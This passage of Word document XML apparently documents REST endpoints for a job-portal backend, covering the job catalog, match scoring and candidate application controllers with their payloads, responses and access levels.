              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Returns currently authenticated user profile extracted from SecurityContextHolder.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Controller: JobController.java</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Architecture: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Base URI Mapping: /api/jobs | Primary Domain: Public &amp; Candidate Vacancy Catalog</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Injected Dependencies: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>JobService, CandidateProfileService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2160"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>HTTP Method &amp; Endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Request Payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Response Code / DTO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Access Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3456"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Execution Logic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>GET /api/jobs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Query params: search, location, category, type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>200 OK / List&lt;JobDto&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Public</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3456"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Fetches active jobs with company &amp; category eager fetched (JOIN FETCH) to eliminate N+1 queries.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>GET /api/jobs/{id}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Path variable: id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>200 OK / JobDetailDto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Public</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3456"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Retrieves complete job specification including description, required skills, and compensation range.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>GET /api/jobs/{id}/match</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Path variable: id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>200 OK / MatchScoreBreakdownDto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Candidate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3456"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Executes multi-factor match engine calculating skill overlap, experience, and location fit.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Controller: ApplicationController.java</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Architecture: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Base URI Mapping: /api/applications | Primary Domain: Candidate Application Lifecycle</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Injected Dependencies: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>ApplicationService, UserService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2160"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>HTTP Method &amp; Endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Request Payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Response Code / DTO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Access Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3456"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Execution Logic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>POST /api/jobs/{id}/apply</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Path: jobId, { coverLetter }</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>201 Created / ApplicationDto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Candidate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3456"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Validates candidate hasn't already applied (UNIQUE constraint), creates Application record in APPLIED status, dispatches notification.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>GET /api/applications/my-applications</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>None</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>200 OK / List&lt;ApplicationDto&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Candidate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3456"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Returns all applications submitted by the logged-in candidate with current pipeline stage and interview details.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>POST /api/applications/{id}/withdraw</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Path variable: id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>200 OK / { message }</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Candidate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3456"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Transitions application to WITHDRAWN status if not already finalized.</w:t>
            </w:r>
